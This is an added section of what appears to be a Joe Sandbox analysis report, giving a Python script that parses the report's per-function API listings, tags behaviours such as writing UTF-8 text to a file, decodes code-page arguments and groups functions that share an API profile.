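The per-function blocks above (the memset → WideCharToMultiByte(0xFDE9, …) → WriteFile sequence at 0040F673, the _snwprintf/memcpy function carrying the "%2.2X" string, and the two functions that share the API ID ByteCharMultiWide$freemalloc but have different Opcode IDs) are easier to triage programmatically than by eye. The script below is an added example, not part of this report and not Joe Sandbox tooling: it parses blocks in the "APIs / Similarity" layout shown on this page, decodes the code-page argument of the string conversions (0xFDE9 = 65001 = CP_UTF8), tags each function with a behaviour label, and lists API profiles that occur in more than one function. The tag names, the rule sets behind them and the code-page table are this example's own assumptions; the sample input is an abridged copy of four blocks from this page.

```python
"""Triage helper for Joe Sandbox per-function API listings.
Added example; the tag rules and the code-page table are assumptions of this
example, not Joe Sandbox signatures."""
import re
from collections import defaultdict

# Abridged copy of four function blocks from the report above (unneeded fields dropped).
SAMPLE = """\
• free.MSVCRT ref: 0041747F
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ByteCharMultiWide$freemalloc
• String ID:
• Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
APIs
• memset.MSVCRT ref: 0040F673
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
• strlen.MSVCRT ref: 0040F6A2
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
• API ID: ByteCharFileMultiWideWritememsetstrlen
• String ID:
• Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
APIs
• _snwprintf.MSVCRT ref: 0040A398
• memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
• API ID: _snwprintfmemcpy
• String ID: %2.2X
• Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
• malloc.MSVCRT ref: 00417407
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
• free.MSVCRT ref: 00417425
• API ID: ByteCharMultiWide$freemalloc
• String ID:
• Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
"""

# One API call line: optional "Part of subcall function X:" prefix, Name.Module, optional (args), ref address.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
# Metadata line such as "• API ID: ..." or "• Opcode ID: ..."
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

# Behaviour tags: (tag, API names that must all be present, String ID that must appear). Assumptions.
RULES = [
    ("writes-utf8-text-to-file", {"WideCharToMultiByte", "WriteFile"}, None),
    ("creates-window", {"RegisterClassW", "CreateWindowExW"}, None),
    ("narrow-to-wide-helper", {"MultiByteToWideChar", "malloc", "free"}, None),
    ("hex-encodes-bytes", {"_snwprintf"}, "%2.2X"),
]
CODE_PAGES = {0: "CP_ACP", 1: "CP_OEMCP", 65001: "CP_UTF8"}  # subset; assumption


def parse_blocks(text):
    """Split the listing into function blocks: {'calls': [...], 'fields': {...}}."""
    blocks, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":      # header of the next function; start a fresh block
            cur = None
            continue
        m = CALL_RE.match(line)
        if m:
            if cur is None:
                cur = {"calls": [], "fields": {}}
                blocks.append(cur)
            cur["calls"].append({"name": m["name"], "module": m["mod"],
                                 "args": m["args"].split(",") if m["args"] else [],
                                 "ref": m["ref"], "subcall": m["sub"]})
            continue
        m = FIELD_RE.match(line)
        if m and cur is not None:
            cur["fields"][m["key"]] = m["val"].strip()
    return blocks


def tag_block(block):
    """Apply RULES to the APIs and String ID of one function block."""
    names = {c["name"] for c in block["calls"]}
    sid = block["fields"].get("String ID", "")
    return [tag for tag, apis, s in RULES if apis <= names and (s is None or s in sid)]


def code_pages_used(block):
    """Decode the CodePage argument of each WideChar/MultiByte conversion ('?' = not recovered)."""
    out = []
    for c in block["calls"]:
        if c["name"] in ("WideCharToMultiByte", "MultiByteToWideChar") and c["args"]:
            try:
                cp = int(c["args"][0], 16)
            except ValueError:
                continue
            out.append(CODE_PAGES.get(cp, f"CP_{cp}"))
    return out


def same_profile_functions(blocks):
    """API ID -> opcode-ID prefixes; several entries means distinct code with one API profile."""
    groups = defaultdict(list)
    for b in blocks:
        api_id = b["fields"].get("API ID")
        if api_id:
            groups[api_id].append(b["fields"].get("Opcode ID", "?")[:12])
    return {k: v for k, v in groups.items() if len(v) > 1}


def triage(text):
    """Return (first ref address, tags, code pages) per function block."""
    return [(b["calls"][0]["ref"], tag_block(b), code_pages_used(b)) for b in parse_blocks(text)]


if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
    print(same_profile_functions(parse_blocks(SAMPLE)))
```

Run against a full report export the same way; the "same profile" listing is the quick way to spot a helper that exists in two compiled variants, and the code-page decode tells you whether a WriteFile sink receives UTF-8 text (as at 0040F690) before you open the function in a disassembler.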